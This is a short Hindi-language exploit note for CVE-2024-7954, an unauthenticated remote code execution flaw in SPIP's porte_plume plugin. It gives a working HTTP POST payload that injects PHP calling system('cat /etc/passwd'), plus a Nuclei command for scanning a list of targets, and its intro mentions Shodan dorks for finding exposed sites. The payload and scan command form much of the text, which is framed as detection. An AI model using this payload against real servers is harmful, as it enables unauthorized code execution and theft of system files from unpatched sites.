
CVE-2024-7954 के लिए शोषण, SPIP के porte_plume प्लगइन में बिना प्रमाणीकरण के रिमोट कोड निष्पादन, पहचान के लिए Nuclei टेम्पलेट और Shodan डॉर्क के साथ।
SPIP द्वारा 4.30-alpha2, 4.2.13, और 4.1.16 से पहले उपयोग किया गया porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता के लिए असुरक्षित है। एक दूरस्थ और अप्रमाणित हमलावर एक क्राफ्टेड HTTP अनुरोध भेजकर SPIP उपयोगकर्ता के रूप में मनमाना PHP निष्पादित कर सकता है। (गंभीर)
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml